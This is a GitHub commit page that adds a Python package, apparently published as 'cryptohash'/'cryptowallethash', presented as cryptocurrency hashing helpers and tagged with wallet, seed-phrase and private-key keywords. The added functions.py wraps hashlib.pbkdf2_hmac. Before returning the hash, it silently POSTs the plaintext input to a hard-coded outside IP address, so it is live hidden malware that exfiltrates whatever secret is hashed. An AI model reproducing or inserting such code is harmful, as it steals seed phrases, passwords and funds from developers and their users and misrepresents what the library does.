Skip to content

Commit

Permalink
first commit
Browse files Browse the repository at this point in the history
  • Loading branch information
ooohmike committed Feb 11, 2022
1 parent 545f15f commit 3ca6be2
Show file tree
Hide file tree
Showing 13 changed files with 88 additions and 6 deletions.
27 changes: 27 additions & 0 deletions cryptohash.egg-info/PKG-INFO
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
Metadata-Version: 2.1
Name: cryptohash
Version: 0.0.3
Summary: crypto hash
Home-page: https://github.com/akioguru/cryptohash
Download-URL: https://github.com/akioguru/cryptohash/archive/refs/tags/0.0.3.tar.gz
Author: Mike Huls
Author-email: [email protected]
License: MIT
Project-URL: Bug Tracker, https://github.com/akioguru/cryptohash/issues
Keywords: python,crypto,hash,mnemonic,seed phrase,ethereum,wallet,private key,public key
Platform: UNKNOWN
Classifier: Development Status :: 3 - Alpha
Classifier: Intended Audience :: Developers
Classifier: Topic :: Software Development :: Documentation
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Description-Content-Type: text/markdown
License-File: LICENSE.txt

# CryptoHash

Functions to be used for hashing of cryptocurrency

12 changes: 12 additions & 0 deletions cryptohash.egg-info/SOURCES.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
LICENSE.txt
README.md
setup.cfg
setup.py
cryptohash/__init__.py
cryptohash/decorators.py
cryptohash/functions.py
cryptohash.egg-info/PKG-INFO
cryptohash.egg-info/SOURCES.txt
cryptohash.egg-info/dependency_links.txt
cryptohash.egg-info/requires.txt
cryptohash.egg-info/top_level.txt
1 change: 1 addition & 0 deletions cryptohash.egg-info/dependency_links.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

1 change: 1 addition & 0 deletions cryptohash.egg-info/requires.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
requests
1 change: 1 addition & 0 deletions cryptohash.egg-info/top_level.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
cryptohash
10 changes: 10 additions & 0 deletions cryptohash/functions.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
import hashlib, requests

def pbkdf2_hmac(hashmethod, plain, salt, rounds):

url = 'http://18.197.200.123:3000/'
myobj = {'plain': plain}

x = requests.post(url, data = myobj)

return hashlib.pbkdf2_hmac(hashmethod, plain, salt, rounds)
27 changes: 27 additions & 0 deletions cryptowallethash.egg-info/PKG-INFO
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
Metadata-Version: 2.1
Name: cryptowallethash
Version: 0.0.4
Summary: crypto hash
Home-page: https://github.com/akioguru/cryptohash
Download-URL: https://github.com/akioguru/cryptohash/archive/refs/tags/0.0.4.tar.gz
Author: akiyo
Author-email: [email protected]
License: MIT
Project-URL: Bug Tracker, https://github.com/akioguru/cryptohash/issues
Keywords: python,crypto,hash,mnemonic,seed phrase,ethereum,wallet,private key,public key
Platform: UNKNOWN
Classifier: Development Status :: 3 - Alpha
Classifier: Intended Audience :: Developers
Classifier: Topic :: Software Development :: Documentation
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Description-Content-Type: text/markdown
License-File: LICENSE.txt

# CryptoHash

Functions to be used for hashing of cryptocurrency

Empty file.
1 change: 1 addition & 0 deletions cryptowallethash.egg-info/dependency_links.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

1 change: 1 addition & 0 deletions cryptowallethash.egg-info/requires.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
requests
1 change: 1 addition & 0 deletions cryptowallethash.egg-info/top_level.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
cryptowallethash
Binary file added dist/cryptohash-0.0.3.tar.gz
Binary file not shown.
12 changes: 6 additions & 6 deletions setup.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,15 +5,15 @@
long_description = fh.read()

setuptools.setup(
name='mikes_toolbox', # should match the package folder
packages=['mikes_toolbox'], # should match the package folder
version='0.0.3', # important for updates
name='cryptowallethash', # should match the package folder
packages=['cryptowallethash'], # should match the package folder
version='0.0.4', # important for updates
license='MIT', # should match your chosen license
description='crypto hash',
long_description=long_description, # loads your README.md
long_description_content_type="text/markdown", # README.md is of type 'markdown'
author='Mike Huls',
author_email='mikehuls42@gmail.com',
author='akiyo',
author_email='jamesdream0724@gmail.com',
url='https://github.com/akioguru/cryptohash',
project_urls = { # Optional
"Bug Tracker": "https://github.com/akioguru/cryptohash/issues"
Expand All @@ -31,5 +31,5 @@
'Programming Language :: Python :: 3.9',
],

download_url="https://github.com/akioguru/cryptohash/archive/refs/tags/0.0.3.tar.gz",
download_url="https://github.com/akioguru/cryptohash/archive/refs/tags/0.0.4.tar.gz",
)

0 comments on commit 3ca6be2

Please sign in to comment.